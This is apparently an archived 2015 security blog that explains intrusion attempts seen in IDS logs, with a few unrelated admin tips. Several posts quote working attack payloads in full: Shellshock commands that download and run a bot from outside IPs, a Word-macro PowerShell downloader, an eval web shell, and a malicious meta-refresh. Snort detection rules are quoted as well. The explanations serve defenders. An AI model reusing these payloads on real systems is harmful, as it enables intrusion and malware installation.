Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Shellshock still going against Moveabletype.org, Hobbit, and FormMail CGI Scripts

Users of the https://movabletype.org/ blog software, the Hobbit CGI Script, and FormMail should double-check that they're patched against Bash/Shellshock. Per this information on pastebin there are some attackers looking to run Shellshock attempts against those pieces of software so I'm guessing they found out that some are exploitable.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, March 17, 2015

It's STILL Time to Kill HTTP

As I mentioned back in December, It's time to Kill HTTP

Here's some quotes related to the topic ...

  • “I feel HTTPS will soon be seen as a requirement for anyone doing business online,” said Paul Moreno, security engineering lead on Pinterest’s cloud team. . See more here from March 2015
  • "We, the Chrome Security Team, propose that user agents (UAs) gradually change their UX to display non-secure origins as affirmatively non-secure." See more here from December 2014
  • Why HTTPS? It’s simple. There is simply no reason not to anymore", Chris Wiegman web engineer for 10up.See more from December 2014
  • "Our goal is to remove the barriers to deploying HTTPS and see an encrypted web completely replace unencrypted HTTP.", J. ALEX HALDERMAN of letsencrypt.com. See more from November 2014
  • "We’d like to encourage all website owners to switch from HTTP to HTTPS to keep everyone safe on the web," said WebMaster Trend analytics at Google, Zineb Ait Bahajji . See more here from August 2014.
  • "If you have a website, it’s a great time to convert it to all HTTPS – and now for multiple reasons," Gleb Budman CEO of BackBlaze.com. See more here from August 2014
  • "HTTPS Everywhere," said web performance engineer at Google, Ilya Grigorik. See more here from June 2014.
  • "We’ll be changing, moving everything to HTTPS somewhere in the coming weeks. My suggestion is you do that too", Joost de Valk from yoast.com. See more here from January 2014


Time to switch to HTTPS and Kill HTTP

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Shellshock Deception with echo

I thought this Shellshock attempt by China.Z was a bit different than what I'd seen before and worth discussing quickly.

() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo echo By China.Z >> /tmp/key.sh;echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo rm -rf /tmp/key.sh >> /tmp/key.sh;chmod 755 /tmp/key.sh;/tmp/key.sh"

Below I've provided some analysis of what is occurring on each line.
  • /bin/bash -c "rm -rf /tmp/*;

    Delete all content from the temp folder.
  • echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Build a Key.sh file that will run the malicious code. In it put as the 1st line the wget download of my evil payload (Perlbot) into a Kinas file.
  • echo echo By China.Z >> /tmp/key.sh;

    Next append to the Key file a command that simply prints my evil handle name.
  • echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that changes the permissions of my payload Kinas file to executable.
  • echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that runs the evil Kinas payload file.
  • echo rm -rf /tmp/key.sh >> /tmp/key.sh;

    Then append to the key file a command that deletes all content from the temp folder to cleanup after themself.
  • chmod 755 /tmp/key.sh;

    Then change the permissions on the key file to executable.
  • /tmp/key.sh;

    Then run my malicious Key file.


The final results if a file /tmp/key.sh that contains the code, which is then executed

wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl.
echo By China.Z
echo chmod 755 /tmp/Kinas.X-brxl.
/tmp/Kinas.X-brxl.
rm -rf /tmp/key.sh


WHY GO THRU ALL THIS EFFORT? Why did China.Z choose to spit everything to a "Key" file before finally running the key file? My best guess is deception. A non linux savvy IT staff at first glance may look at the code above and assume that this is a bunch of harmless echo's ... basically a proof-of-concept attempt saying that 'if I was evil, I'd be able to own you ... but I just did some echo's so I'm a friendly'. But if you look closer per my analysis you'll see that the echo's are actually used to deliver the payload and infect the machine.

Keep on monitoring!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Monday, March 16, 2015

Malware in a .html File

When you receive an email with an attachment, you might be extra cautious if the attachments ends in certain extensions like

  • .EXE
  • .ZIP
  • .BAT
  • .PS1


You might even be a little concerned nowadays with some more common extensions like

  • .PDF
  • .DOCX
  • .XLSX
  • .PPTX


But how many of you would think that the following extensions are concerning?

  • .htm
  • .html


Long story short, you should. You may think you're loading a local harmless HTML file, but here's an example where you'd actually be loading an evil file from a separate site and maybe you wouldn't even know it. If the .htm/.html file contains the following ...

<html> <meta http-equiv="refresh" content="0; url=http://www.evilsite.com/evilfile"> </html>

Don't open files you weren't expecting, from people you're weren't expecting to send it.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)


I posted a few more details here. Just by the looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;


  • 1.) First you'll see ...

    cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX

        A.) 'cmd' is your friend command prompt

        B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes

        C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.

        D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.

        E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.

        F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2

  • 2.) Second you'll the Powershell script code that tries to download the payload

    (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')

        A.) '(New-Object System.Net.WebClient)' is the equivalent in a high level programming language like of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.

        B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\JIOiodfhioIH.cab' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
  • 3.) Third you'll see a command script trying to extract the contents of the CAB file

    'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'

        A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
  • 4.) Fourth and finally you'll see a command script trying to execute an EXE

    'start %TEMP%\JIOiodfhioIH.exe;'

        A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.


So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evily suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Friday, March 13, 2015

FTP bounce attack

Have you been digging deep into your IDS logs and noticed this snort alert ever?

FTPP_FTP_BOUNCE (125:8)
alert (msg:"FTPP_FTP_BOUNCE"; sid:8; gid:125; rev:1; metadata:rule-type preproc, service ftp; classtype:bad-unknown; reference:cve,1999-0017; reference:url,www.kb.cert.org/vuls/id/276653; )

Let's try to figure out what it means. So I opened my packet capture and saw 2 records.

X1.X2.X3.X4:18663 => Y1.Y2.Y3.Y4:21 [ FTP , COMMAND=PORT, ARGS=Z1,Z2,Z3,Z4,P1,P2 ] X1.X2.X3.X4:42762 => Y1.Y2.Y3.Y4:21 [ FTP , COMMAND=PORT, ARGS=Y1,Y2,Y3,Y4,P3,P4 ]

The source IP X1.X2.X3.X4 was a Post NAT address where a lot of traffic goes through. The destination IP Y1.Y2.Y3.Y4 was some externally hosted FTP server. But those FTP commands looked a bit weird so I had to google what they meant. This old article about the FTP port command tells me that Z1,Z2,Z3,Z4 actually is listing the client's ip address Z1.Z2.Z3.Z4! And P1,P2 is a hex formatted version of the Client's Port. Same thing then for Y1,Y2,Y3,Y4 and P3,P4.

So what the Snort rule is trying to tell you is that the Source IP is sending 2 FTP PORT requests, but the Client IPs provided in the PORT command don't the match the real client's IP. This flaw is old and most modern FTP servers handle this scenario by validating that the Source IP and the IP provided by the client match the original ones given, but it's interesting to see an alert on it anyways.

Conclusion: This was a false positive. Why? Because IDS didn't know that this was a Post NAT IP address (basically every user inside a company is seen to the outside world has coming from 1 IP address from your company). And thus the IDS didn't know that this really wasn't the same user, it was 2 different users hidden behind the NAT. Thus this situation requires some tuning in your IDS or SIEM monitoring tools to ignore.

Keep monitoring those logs!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

PHP Injection Attempt ali.txt Explained

I posted the basic details here pastebin.com/AqDJrchF but I wanted to go into more detail.

PUT /ali.txt HTTP/1.1
Accept: application/json
Content-Type: application/json
Content-Length: 39
Expect: 100-continue
Connection: Keep-Alive


alihack<%eval request("alihack.com")%>


So it's been around for a while, you may have seen the requests, but what are they trying to do?

1.) First evil IP (192.210.60.124) sends the attack request. It's difficult to tell without further research if this is truly a bad guy's server or just a good guy's server that was compromised and is now being used to launch attacks for the attacker

2.) Second an IDS (Intrusion detected system) is sitting in front of the web server watching requests come in and firing off Snort rules. It triggered on this one because the url contained '/ali.txt' in it and it was a PUT http request.

MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt (1:32875)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"MALWARE-TOOLS BlackSpider Tool ali.txt file upload attempt"; flow:to_server,established; content:"/ali.txt"; http_uri; urilen:8; content:"PUT"; http_method; metadata:impact_flag red, service http; reference:url,virustotal.com/en/file/3b0e2ab93a43db122bc9ba4448cb21c8ae01f18068b15a6e0a71db61fb943ed1/analysis/; classtype:misc-activity; sid:32875; rev:1; )


3.) Third If the web server has HTTP PUT enabled (which is pretty much unheard of nowadays on the Internet) then you have a major problem because that means anybody in the world can upload any file they want to your server by running the PUT command.

PUT /ali.txt

4.) Fourth and finally if the attack successfully uploads the 'ali.txt' file then the file will contain the PHP script below so that when the attacker makes a call-back to your website/ali.txt they'll see the text 'alihack.com' and know it was successful. In this case I think the general idea is that this truly isn't a bad guy attacking, it's good guys trying to share and create awareness that you shouldn't have HTTP PUT enabled. So check your web server, if you see ali.txt you know you've got issues and need to fix them.

alihack<%eval request("alihack.com")%>

Lock those servers down!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Shellshock Attempt Explained

I posted the basic details here pastebin.com/uGux9X83 for this attack.

But in this post I'd like to go a bit deeper and attempt to explain what's going on.

First this evil IP ( 85.214.149.179 - in Germany) sent an attack to a web server. Now it's difficult to say without doing further research whether this source IP is truly malicious, or if it's just some good guy's box that was compromised and now the attacker is launching attacks from it.

In front of the web server was an IDS (Intrusion Detection System) that runs Snort rules. The attack triggered the following alert because it contained the text '() {' in the http header (in this case in the User Agent header).

Bash CGI environment variable injection attempt (1:31978)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"OS-OTHER Bash CGI environment variable injection attempt"; flow:to_server,established; content:"() {"; fast_pattern:only; http_header; metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:cve,2014-6271; reference:cve,2014-6277; reference:cve,2014-6278; reference:cve,2014-7169; classtype:attempted-admin; sid:31978; rev:4; )


The attack made a request to the following cgi page because it's well known that web servers running the cgi module with a bash prompt that is unpatched could be vulnerable to Shellshock.
GET /cgi-bin/test.cgi

In the User Agent HTTP Header there are linux commands that I'll explain below. But the Shellshock vulnerability sucks because the cgi module uses the bash shell which is stupid and not properly validating it's input and ends up blindly running any linux commands after the '() { ;;};' text under the same account the website is running under which can lead as you'll see below to very bad things.

User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*");'

So finally to the good stuff.

  1. First the attacker prints out the text 'SUCCESS!' to the browser. He does this so his automated bot that is scanning for vulnerable systems can flag this web server as vulnerable.
    /usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";
  2. Second the attacker runs wget to download his malicious perlbot script from yet another server and saves it to the /tmp folder as 'b.pl'. The attacker saves it here because it's likely a location that the web server account has access to. Again it's tought to tell if 202.191.121.230 is a bad guy's server or just a good guy's server that an attacker compromised. But needless to say, this is the IP you want to look for in your IDS or SIEM or Web Server logs. Crawl through them and if you see any successful callbacks to this IP then you have a problem because that code was executed!
    system("wget http://202.191.121.230/ou.pl -O /tmp/b.pl");
  3. Third the attacker makes a 2nd attempt using curl to download his malicious perlbot script ... just in case the 1st one (wget) failed. This increases the attack's success rate because sometimes wget or curl might be allowed and available and sometimes not.
    curl -O /tmp/b.pl http://202.191.121.230/ou.pl;
  4. Fourth the attacker executes the malicious perlbot script. The attacker does this to plant a backdoor and fully take control of this web server. It's likely that the perlbot script will start running some IRC channel or listening device that will occasionally check-in or listen for commands to run from the command and control server and likely use your web server to launch attacks against other victims.
    perl /tmp/b.pl;
  5. Fifth and finally the attacker cleans up his mess by deleting files that match the pattern 'b.pl*'. The attacker does this to make it harder for you to know you're a victim. You won't see any remnants of files, temp files, or anything related to the attack. You'd only know you were compromised by watching the traffic in/out of the server or looking at currently executing processes.
    rm -rf /tmp/b.pl*;
Patch your servers!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Wednesday, March 11, 2015

Malware that leaves Web Fonts behind?

I thought the SANS Podcast from 2/24/2015 by Johannes Ullrich was interesting. In the Podcast he mentioned Google Webfonts being used by Google to track user activity. Which I believe then led to this great Diary on 11 Ways To Track Your Moves When Using a Web Browser.

So traditionally when you think of evil corporations and the NSA trying to watch you, track you, etc. you probably think of things like cookies, your user-agent, and your IP address, right? So you try to prevent them from tracking you probably with things like in-cognito or private mode, or using a proxy / Tor browser, right?

Would you have also considered that Web Fonts can be used in the same way? They are essentially being used by Google as tracking cookies. They are generating a new unique font name for each user and thus they know that if the web font is already cached locally in your browser cache, then they have seen you before and know you're the same user. A little concerning from a privacy perspective!

And there is nothing stopping malware and other malicious content on the websites you're visiting from doing the same thing. It's known that many pieces of malware will drop a cookie and use it to make sure it only runs the malicious content once on that user. It's pretty simple to swap out the cookie and instead have the malware drop a google web font into cache and use it as the indicator. So intrusion detection and other security related software might need to look in the other crevaces of your browser (Cookies, Web Fonts, Flash Cookies, HTML5 Local Storage, etc.)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Running Malwarebytes updates behind a Proxy

I keep trying to update my Malwarebytes database but it fails with "Unable to Access update Server"!


To fix that, go to Update Settings and enter your proxy server and credentials

Then re-run the update



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Make sure you run Malwarebytes with a Updated Database!

Make sure you run Malwarebytes with an Updated Database! If you're running an old version there's almost no point. Malwarebytes updates their database daily with new findings and malware types. You want your scan to be looking for the cutting edge stuff. BEFORE you ever run a scan, update the database version.

Step 1.) Click "Update Now"

Step 2.) Wait

Step 3.) Validate Version is up to date, then Run Scan



Did I run on the latest version?
To find out, open the Malwarebytes log file and check this section
Version: 2.00.4.1028
Malware Database: v2014.11.20.06


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

QRadar Custom Right-Click Menu for IP Addresses

In your SIEM here's how to setup a custom Right-Click menu for IP Address

1.) Open ip_context_menu.xml with an editor like 'nano' (Likely located in /opt/qradar/conf)

2.) Add the following line
<contextMenu>
<menuEntry name="ARIN Lookup" url="http://whois.arin.net/rest/ip/%IP%" />
</contextMenu>
3.) Restart the tomcat service (Admin -> Advanced -> Restart Web Server)

4.) Enjoy the results!




Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.